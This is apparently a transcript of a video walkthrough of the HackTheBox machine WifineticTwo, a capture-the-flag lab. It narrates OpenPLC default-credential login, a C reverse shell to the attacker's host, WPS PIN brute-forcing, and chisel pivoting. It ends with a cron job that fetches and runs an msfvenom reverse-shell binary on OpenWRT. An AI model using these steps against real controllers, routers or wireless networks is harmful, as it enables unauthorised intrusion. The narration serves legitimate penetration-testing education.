What's going on YouTube? This is Ipsec. We're doing WifineticTwo from HackTheBox, which is a relatively short box at around like 2.5 steps, but it is pretty fun. It starts out by finding the OpenPLC web interface with default credentials, and you can just write some C code in that, and then it will compile and run it for you, so you get a reverse shell on a box. The second step is discovering that box has a wireless NIC. You can perform a scan, discover there's a wireless network that has WPS enabled, and then you can run a program in order to brute force the WPS key in order to get the pre-shared key, and then configure the box to join the wireless network. And here's where the hard step comes in. Once you join the wireless network and run DHCLIENT, there is a chance you just hang the box if you don't configure DHCLIENT to not auto-update your routes, because there is a chance that it just no longer knows how to get back to you. So that is going to be where we spend most of the time in this video. But once you get the IP address on the wireless network, you can just log into OpenWRT and get the root flag. So with that being said, let's jump in. As always, we're going to start off with an nmap. So -sc for default scripts, SV enumerate versions, -vv for double verbose. This gives us the TTL. OA output all formats, put in the directory nmap and call it WiFineticTwo. Then the IP address of 10.10.11.7. This can take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80, its banner tells us it's running WorkZug, and Python version 2.7.18. This is ancient, right? Let's see, the release notes for Python, it's back in 2020, so like over 4 years ago. And the SSH banner is for Ubuntu 0.1.1 on 8.2p1. This is probably Ubuntu Focal. That is 20. Let's see. I can get rid of OpenSSH. Let's just Google that. Go over to Launchpad. And we see this is Ubuntu Focal. So right now, despite the TTL both being at 63, I'm thinking these are 2 different operating systems, right? I would expect this to be 62 and this to be 63 on HackTheBox just because this would be an extra hop away. But since they're both there, maybe it's running Docker or something and not decrementing the TTL. But it's definitely odd to see Python 2.7 on a box nowadays. It could also just be manually installed on this Ubuntu 20 box, but I'm guessing maybe like Ubuntu 16 or something like that that's just ancient. Not much else to look at. Let's just go over and examine the web page. So I'm going to go to 10.10.11.7, port 8080. And we get the OpenPLC web server, which is a programmable logic controller. But whenever I get logins to something like this, I always Google default credentials to see what it is. It's probably gonna be like admin or something like that, but we can see it's OpenPLC and OpenPLC. So let's go and type that, OpenPLC, and default credentials get us logged in. Now we could look for a bunch of vulnerabilities in this, but OpenPLC gives you the ability to run code by design, right? So a PLC is a programmable logic controller. It's just a really simple computer to interact with machines. It doesn't have like a full-blown OS. Maybe the most common example or the device you interact with the PLC most is probably like a washing machine, because you interact with it through the knobs and buttons on the washing machine. And then there's a computer there that tells it how to, like, the cycle, tells it how to fill it with water, how to spin the clothes, how to drain it, how to heat the water, like all that's controlled probably by a PLC device, right? So OpenPLC is just allowing us to simulate programmable logic controllers on a full computer, right? And this is the hardware. So we can just put a reverse shell here and we'll get a callback. If we look at what this function is, this update custom out, this function is called by OpenPLC in a loop. So this is where we want to put the code. So let's just Google a C reverse shell and we'll get one back, right? I don't know if that is the one I want. This one is a little bit complex. I just want a really simple one like this. If we look at that other one, I recognize the repository as soon as I hit it. It's got just a lot more code that I didn't want to deal with, right? So if we look at that versus this is much simpler. So what I'm going to do is copy the headers, and we're going to put them, let's see, where's my OpenPLC login? Am I not logged in? Okay, there I am. We're going to put all those headers at the top, and then we're going to put our IP address here. So this is going to be 10.10.14.8, and then port 9001. We're going to make sure we are listening. And then let's go ahead and grab the other code. Go back here, and I'm going to put it where it just loops over. And I think that's all we need, right? So let's do save changes, and it's going to compile the program. And we got an error message. It says iNet address was not declared in the scope. Do you mean this? I'm going to Google the error message. And let's see. Do we have any answers? It's probably we're just missing some library header. For iNet, we need socket. We need these three. Let's make sure we have those. We can go back to hardware. Okay, we had socket. We have this net iNet. We did not have arp-a inet.h. So let's try saving the changes with that one and see if it actually compiles. It says compilation has been successful. If we go to dashboard and click start PLC, we can see we have a reverse shell. So let's go get a proper shell. So I'm going to do Python 3-c, import pty spawn, bin bash, and then Control-Z, stty raw minus echo, and then foreground it. We can export term is equal to x term, so we can clear the screen and do things like that. So the first thing I want to look at is what version of Ubuntu we are on. And oddly enough, we are on Ubuntu 20.2, and the host was Ubuntu 20. So we're actually running Python 2, right? We have Python 2.7 on a newer container than what the host is, right? Unless for some reason they like backported SSH on the host, but I really don't think that's the case. Regardless, we could find out if that is the same SSH server potentially. We don't even have SSH listening. So we know we're in some type of VM or container because when we scan 10.10.11.7, we got SSH back. We don't have that. So let's see. What else do we want to do? There is one thing I want to talk about. If we try accessing the box again, it's just hung, right? And that happens a lot with just when you see Python workzug. If it's not a threaded application, which Python 2, of course, it's not going to be threaded, you're going to hang the web server when you do this. Now, I tried making a fork in my code. So what I had done, let's see, I don't think I can access the code easily anymore. But essentially, I just called fork and then ran it so it would run in the background or a child PID. And eventually it just destroyed the whole web server. So that didn't work. There is something that is funny. If we Google OpenPLC reverse shell, if we did research like this, the top result will be this repository. And this is obviously created for this box. That's why I decided to do it manually first, because we can see everything's hard-coded to use HackTheBox information. But the thing I found funny, when I first looked at this before playing with it myself and trying to fork my own server, I thought it was really silly because their C code, they're just calling bin bash, right? But there is a reason why they're doing this, I believe, and that is they start a new process and background it. And when you do it that way, the fork doesn't screw up the whole web server, and also the server is just going to last, right? So right now, as long as we have the shell, we can't interact with the website. So that's something I'll always test for when doing pen test. Now, let's take a look at what's on this box. If we do a IPA, we can see there is a wireless NIC, a WLAN. its state is down, but if I do a IW, then we'd say device WLAN 0 scan. This is going to just perform a scan on this NIC or wireless LAN, and we can see we get one hit back, right? We have, let's see, what is the SSID? We have the PLC router, and it supports WPS. So since it supports WPS, there is a chance that we can just break into it. If you want to learn more about WPS, I dive really deep into exactly how it works in the WiFinetic video. Here, we're just going to download a script and get it working, right? And I'm going to use OneShot and not Reaver, because OneShot is going to be Python, Reaver is C, and it's a pain to get all the dependencies over to this box to get Reaver working. Whereas if it's Python, we can just run it and it works, right? So let's go and download OneShot. So we can say a git clone over here. And then I'm going to stand up a web server. So HTTP server. Let's go dev shm wget 10.10.14.8 8000 oneshot.py. Not found. Let's do a curl and we'll call it oneshot.py. There we go. If we execute this to make sure it downloaded, it works. So let's just do -i WLAN 0. And it's going to perform a scan. We could have specified BSSID to do it manually, but I'm going to hit 1 for target 1. And it's going to attempt the pin 1234567 and it gets authenticated. So this is, I think, going to be OneShot will do various attacks, but it just defaults to testing 1234567 first because that is the default pin, I believe. I think Reaver does that as well. But we get access to the pre-shared key through the WPS pin and the SSID. Now, there is a weird thing in this next step, which is connecting to the wireless network. And it's going to be a bit of a pain to show. Hopefully it's not that hard to follow. But essentially, once we join the wireless network, we're going to have to run DHCLIENT to get a IP address. And depending how we do DHCLIENT, it can just break the route back to us. Because I think there's a race condition. I don't fully understand what's going on. But every now and then when I did a DHCP update, it just took the default route of the wireless network, and the wireless network can't get back to the 10.10.14 address, which then just made the box be completely unresponsive. Now, it's very odd how it hits that condition, why I think it's a race condition. So let's generate a config file so we can join the wireless network. So I'm going to do a WPA passphrase, and we specify the SSID, and then we have to specify the password. Let's see. It's like that. There it is. So let's go and grab this. And that has a special character in it, so I'm going to do this. So I'm going to call that WPA.conf. And you can actually use the plain text or the hex version for the pre-shared key. Now, if you use the hex version, I don't think anything bad's going to happen when I run DHCLIENT to get an IP address. Now, if I use this, I do, which is really bizarre. And I think it's a race condition because I actually think the time the WPA is taking to convert this to hex means this is going to lose the race condition between the wireless interface and the hardwire interface. And whatever one is last is, I think, is going to be the default route. So since this becomes last when we specify the text, then the box becomes unresponsive. I think that's what's happening, but I'm not sure. But I wanted to show it because there are some good talking points here, right? So I'm going to use WPA supplicant, and then we're going to say -B. This is going to run in daemon mode, so it runs in the background. Then we specify the config file with -C, so this is going to be dev shm wpa.conf, and then specify WLAN 0. And this is going to connect the device, right? So if I do IW dev WLAN 0 link, we can see we are connected. So we have successfully authenticated the access point. So now if I just do DHCLIENT, or we can do IPA. There's no Ethernet address. So I'm going to run a DHCLIENT and then -v. I could specify WLAN 0 as well, but if we just do -v, we get an IP address and everything comes back. Now, I'm going to revert the box, and we're going to do this again. And when I do it again, I'm going to use the pre-shared key in the normal format. So let's revert the box. And through the powers of editing, I have already reverted the box. So if I do iwdev WLAN 0 link, we see we aren't connected and we don't have an IP address. So let's rerun that command to generate a config. And I'm going to call it wpa.conf. But this time we're going to edit the config and I'm going to specify it in the ASCII form. And now we'll join the network. So we're going to run wpa supplicant in background, point it to the config, and then the interface. So now if I look at it, we see we are connected. So now if I just do a DHCLIENT-v, hopefully the wireless NIC will finish after the hardwire NIC, and we'll just hang because we'll have a default gateway of the wireless NIC. And it looks like, oh, we got it. Wait, maybe? I think it's hung. So I think the box now is completely hung and we'll never get a connection back. So what I'm going to do is we're going to cheat a little bit. We're going to skip over and get a shell on the root of the box. So I'm going to start this up and go over to my other monitor, click the super secret button to send myself a shell, and we'll get a shell on the root of the box so we can go into this container and show you exactly what happened. And I know, sorry, we're kind of like jumping all over the part on this box, but I do think this is somewhat interesting, right? So I'm going to do LXC-LS because all these are containers. And I think I was on Attic 01, right? So the containers, because we're joining the wireless network, we have 10 of them. So there's 10 people that can do this simultaneously without stepping on each other, right? But I'm going to do LXC attach on my container. If I do IP route, we can see the default route now is 192.168.1.1. And since this is the default, the WLAN 0 interface cannot get to my 10.10.14 interface, and that's why this hung, right? If I go and attach to, let's do LXC attach Attica 02, IP route, we can see what it should look like, right? So when it wasn't hanging, when we just did it before, the default route was 10.0.3.1 on Ethernet 0, so that's why it maintained connectivity. So I think it's just how it gets the responses from DHCP in order what it sets first, right? So if the Ethernet is the very last one it gets, then it'll set that as the default gateway, I think. If WLAN 0 is, then it sets that. It's a weird thing where they conflict with each other, right? So I'm going to revert the box one last time to show you how I would recommend doing any type of DHCP update, right? Because if you're on a client and you're doing something, you do want to say, hey, I have this box. I want to do a DHCLIENT and get a new IP address on this network. You don't want it setting the route for you because it may just destroy everything you have. So let me revert the box. And now the box has been reverted. I did join the network. So if I do iwdev WLAN 0 link, we can see we are connected, but don't have an IP address. So now I'm going to go over to Google. I'm going to say DHCLIENT do not update default route. And let's see. I think it's this post right here I had found on Stack Overflow. And it talks about editing the DHCP enter hook and then adding this variable. I can't find a argument in DHCLIENT to apply this. So this looks like the best way to do it. So we're going to edit this. So we're going to create this file. It's not actually editing. And then all we have to do is say unset new routes. And I don't even think it has to be executable or anything, right? Yeah, I think we just run this. And now Again, no IP address. We can say DHCLIENT-V, and we get a IP address right away, right? So that is how I would do this, just because, again, whenever running DH client, if the gateway or DHCP server gives you a new route, it's going to update and it can screw up your existing shells. So I really like doing that. And after you do it, definitely delete that file you had just created so you don't create issues going forward, right? Because if this box rebooted, and this route was in here, when it gets this 10.3 whatever address, if this was DHCP, it's not going to create the default gateway, and this box isn't going to have internet. So definitely always make sure you undo that rule after you create it. But now that we have that set, we can look at the gateway. So we know the gateway is 192.168.1.1. We did that just because we looked at the route already. Let's see. That's the default. Oh, we don't see it actually here. I bet if I did an arp-an, we do see 192.168.1.1. So we can ping that and talk to it. So if we wanted to, we can see what ports are open. So if we try to connect to it on like port 22, we get a drop bear server, interesting enough. I expected to see like open SSH, but this is drop bear. So if we try SSHing there, it logs us in right away, and that's actually the box. So we could cat root.txt and get it. So yeah, there is something else that's interesting. So if we had curled that IP address, let's say SSH wasn't open. This is actually running OpenWRT. So let's set up Chisel so we can connect and view this website through a browser. So let's go over here. We can go in www. I'm going to copy opt. Is it Chisel? Yep, I have it on my box. So let's just copy it there, and then we can do curl 10.10.14.8 8000/chisel out Chisel. Okay. chmod plus x Chisel. Let's make sure we can execute it. We can't. Let's see. Oh, I started my server in OneShot. There we go. Let's download it again. chmod plus x Chisel. We can do Chisel server port. Let's do 8000 and allow reverse. We already are listening on 8000. We'll do 8001. And we can say Chisel. Okay. Client. And we want to say 10.10.14.8, port 8001. Stand up a reverse socks. There we go. So now if I configure Firefox to use socks 5, we should be able to go to 192.168.1.1. And we get a login form. If we just click login, it's going to let us log in because there is no password set. And this is the OpenWRT interface. So here we can do system. And then if we went over to, let's see, we got scheduled tasks. And this says this is the system cron tab, which a scheduled task can be defined. So 1, 2, 3, 4, 5. So this is going to run every minute. And then we just need to know what is on this box. So I'm going to cheat a little bit because we do have a shell here, right? sh root at 192.168.1.1. Because I don't think there's actually bash. If we do ls bin bash, there is no bash on this. So that means we can't do the dev TCP shell. I'm going to check if we have curl. We don't. Do we have wget? We do. So we're going to use wget. We can exit and then foreground our proxy. So I'm going to do wget 10.10.14.8 port 8000. And we'll do a program called shell. And I'm going to save this. So this should run every single minute. And we should see it get hit here. Let's do MSFVenom. Let's see. The payload is going to be, was it Linux? I don't know what it is. Is it list payloads? And we're actually not getting a shell back here. I should have something waiting like sleeping 60 seconds to see exactly when a minute is. But this interface, I don't think can actually hit the 10.10.14 address. What we could do is stand up a second one. And we want to do IPA. Let's see, we are 192.168.1.84. Let's just set that here. And see if we can actually do a wget against this box. And unfortunately, let's see, foreground 1. So that's saved. Background, foreground 2. That's the netcat. So let's see if it actually makes a request there. Let's see. Reverse TCP. That's Windows, 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 Windows. We only want Linux. Let's see. grep Linux grep reverse TCP. That may be better. I hate how it just truncated so much right there. That was annoying. I don't want to unzoom my window because it may get back to that, right? Let's see. This is what we want. Linux x64. There it is. So we can say -p Linux x64 and then shell reverse TCP. lhost is equal to what do we say this was? We did make a wget there. So that is the correct one. We want 192.168.1.84. And the L port is going to be, we'll do 9001. The format is going to be elf out, we'll call it shell. That should create it. And then we'll do a wget on 10.10.14.8, port 8000, shell, out, shell, and this can't be wget. This needs to be curl. There we go. So we have downloaded it. File shell 404, move shell to www. Okay. So now we want to host this. So Python 3-m HTTP. Oh, this is going to be annoying. We need like, let's see. Let's kill Chisel. Do we have screen on this box? Do we have tmux? We don't have any of those. We need multiple sessions. I guess I could run the web server in the background, but let's just do --c --i dev TCP 10.10.14.8 9001 like that. Do I have a shell? Don't. Why is that not working? Let's try just moving the and in there. There we go. That works. So this is how we can run multiple processes easily. Let's do nclvnp 9001. There we go. Okay, so this one, we want to run Chisel. So /Chisel client 10.10.14.8 8001 socks. Okay, we'll need another one, nclvnp 9001. Send this shell. There we go. So here, let's do Python 3-c import pty spawn bin bash. I screwed that up. Copy. Paste. st2i raw minus echo foreground. There we go. So this one, we just want to run a HTTP server because that's going to give shell. And here we listen on 9001. Okay. So we can wget the shell. Then we can say chmod +x on shell, and then we can execute shell. So we save this. Is my Chisel not connected? 1080. It's hung. I think something's wrong with my burp proxy, which is annoying. Let's see. I just killed that whole shell. Let's go back, send it. ps-ef. Grep on Chisel. We got 2 running. Let's kill 678, kill 739. Let's see, foreground. Can we foreground? Okay. I think that's good. I'm really hoping I didn't just kill these shells up here. Okay, I got it. So I definitely didn't. Let's see. What do we want to do? Chisel. Chisel client 10.10.14.8 8001 socks. I'm going to restart Chisel here so we just get it fresh. Looks like it connected. Try again. There we go. Let's go to System, Schedule Tasks, and we can redo what we did here. So we wget chmod +x on shell, then we execute shell. And if everything goes well, we'll get the shell over here. Let's just make sure we are listening. Oh, we are. Sweet. We have a connection. Do ls. And there we go. We got root. So hope you guys enjoyed the box. That's going to be the video. Take care, and I will see you all next time.